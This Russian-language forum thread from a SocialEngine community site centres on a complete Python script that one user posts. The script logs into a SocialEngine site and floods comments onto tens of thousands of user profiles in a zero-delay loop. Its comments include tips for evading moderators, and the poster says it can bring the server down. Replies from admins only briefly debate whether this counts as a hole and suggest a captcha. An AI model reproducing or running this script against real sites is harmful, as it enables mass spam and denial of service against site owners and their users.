1. Мы продолжаем публиковать интересные статьи на тему SocialEngine 4. Одна из статей посвящена правильному выбору сервера для вашей социальной сети, а другая содержит советы по увеличению производительности платформы. Также мы добавили большую статью о пользовательских уровнях. Ознакомиться со статьями вы можете в разделе Вопросы и Ответы SocialEngine 4.

  2. Вам кажется, что ваша версия SocialEngine 4, работает медленно?

    Голосуйте. Пишите свою версию системы, железо на чем работает и количество пользователей. Будем увеличивать производительность :-) Подробнее

  3. В связи с участившимися случаями попыток продажи пользователями форума различных "сборок" коммерческих социальных платформ, обычно основанных на SocialEngine 3, вводится новое правило для форума. Запрещается создание тем или размещение в уже созданных предложений о продаже или размещение ссылок на сайты, где происходит продажа "сборок". Пользователи, которые продолжат свою коммерческую деятельность в данном направлении, будут заблокированы. Подробнее.
Новые полезные статьи о SocialEngine 4 Ваш SocialEngine 4 медленно работает? Запрет на размещение информации о "Сборках"

To Admins Спам в SE через python

Discussion in 'ЦЕХ' started by afsun, Feb 29, 2012.

Page 1 of 2

  1. afsun Thread starter Active member


    Offline
    Message Count:
    182
    Likes Received:
    53
    Вот нашли дырку в SE
    Code:
    #!/usr/bin/python
# -*- coding: utf-8 -*-
import sys, tempfile, pycurl, time, urllib
 
 
#####################      НАСТРОЙКИ ТУТСЯ:
 
# Вайпать начиная с ID (не ставь слишком мелкое, ибо можно в модера попасть. Разве что под конец атаки ;-) )
wipe_from = 1000
 
# Вайпать до ID (+1)
wipe_until = 1 + 100500
 
# Сообщене
text = """тут текст"""
 
# Таймаут (в секундах) между сообщениями (можне 0, модем не сгорит же)
timeout = 0
 
 
 
## Do nothing function
def f(arg):
    pass
 
 
## curl
curl = pycurl.Curl()
 
### Login
 
print "Login..."
 
## User options
try:
    login = sys.argv[1]
    password = sys.argv[2]
 
except:
    print "Login >"
    login = raw_input()
    print "Password >"
    password = raw_input()
 
## cookie file path
cookiepath = tempfile.mktemp()
 
## Setopt
curl.setopt(pycurl.USERAGENT, "Upyachne 0.1")
curl.setopt(pycurl.COOKIEJAR, cookiepath)
curl.setopt(pycurl.FOLLOWLOCATION, 1)
curl.setopt(pycurl.MAXREDIRS, 5)
curl.setopt(pycurl.WRITEFUNCTION, f) # disable default curl output
curl.setopt(pycurl.COOKIEFILE, cookiepath)
 
curl.setopt(pycurl.URL, "http://имя домена.com/login.php")
curl.setopt(pycurl.POSTFIELDS, "email=" + login + "&password=" + password + "&task=dologin&ip=81.234.254.1")
curl.perform()
 
### End of login
 
 
 
## Wall wiping
 
curl.setopt(pycurl.URL, "http://имя домена.com/misc_js.php")
for i in xrange(wipe_from, wipe_until):
    print i
    curl.setopt(pycurl.POSTFIELDS, "task=comment_post&type=profile&iden=user_id&value=" + str(i) + "&tab=users&col=user&user=" + str(i) + "&comment_body=" + urllib.quote(text))
    curl.perform()
    time.sleep(0)
    Давайте коллективным разумом закроем данную дурку.
    afsun, Feb 29, 2012
    #1

  2. berdyev Famous member


    Offline
    • Знаменитый
    Message Count:
    339
    Likes Received:
    104
    My version of SE:
    3.15
    My version of phpFox:
    3.0.1
    My version of Oxwall:
    1.3.0
    Если бы я мог..
    berdyev, Mar 1, 2012
    #2

  3. Prado Challenge Everything


    Offline
    • Admin
    Message Count:
    3,191
    Likes Received:
    786
    My version of phpFox:
    3.0.0
    А почему это считается дыркой?
    Prado, Mar 1, 2012
    #3

  4. afsun Thread starter Active member


    Offline
    Message Count:
    182
    Likes Received:
    53
    Иначе не назовешь!
    Просто закупается скрпит и спустя пару минут (в зависимости от сервера) смотрим как весело и с криками падает сервер (ну или висит).
    afsun, Mar 1, 2012
    #4

  5. Gooos абырвалГ


    Offline
    • Admin
    Message Count:
    2,435
    Likes Received:
    645
    My version of SE:
    3.20
    так не надо его запускать =)
    Gooos, Mar 11, 2012
    #5

  6. afsun Thread starter Active member


    Offline
    Message Count:
    182
    Likes Received:
    53
    Мда. ))) запускает скрипт тот кто хочет спамить в комментах тебя, меня или любого другого (владельца SE)
    afsun, Mar 11, 2012
    #6

  7. Prado Challenge Everything


    Offline
    • Admin
    Message Count:
    3,191
    Likes Received:
    786
    My version of phpFox:
    3.0.0
    Капча.
    Prado, Mar 14, 2012
    #7

  8. afsun Thread starter Active member


    Offline
    Message Count:
    182
    Likes Received:
    53
    не вариант.
    afsun, Mar 14, 2012
    #8

  9. Gooos абырвалГ


    Offline
    • Admin
    Message Count:
    2,435
    Likes Received:
    645
    My version of SE:
    3.20
    Gooos, Mar 16, 2012
    #9

  10. afsun Thread starter Active member


    Offline
    Message Count:
    182
    Likes Received:
    53
    Ну это явно не вариант, так как они это просекут сраузу, и просто в скрипте поменяют login.php на другой
    afsun, Mar 16, 2012
    #10
Page 1 of 2

Share This Page

All rights reserved SocEngine.ru ©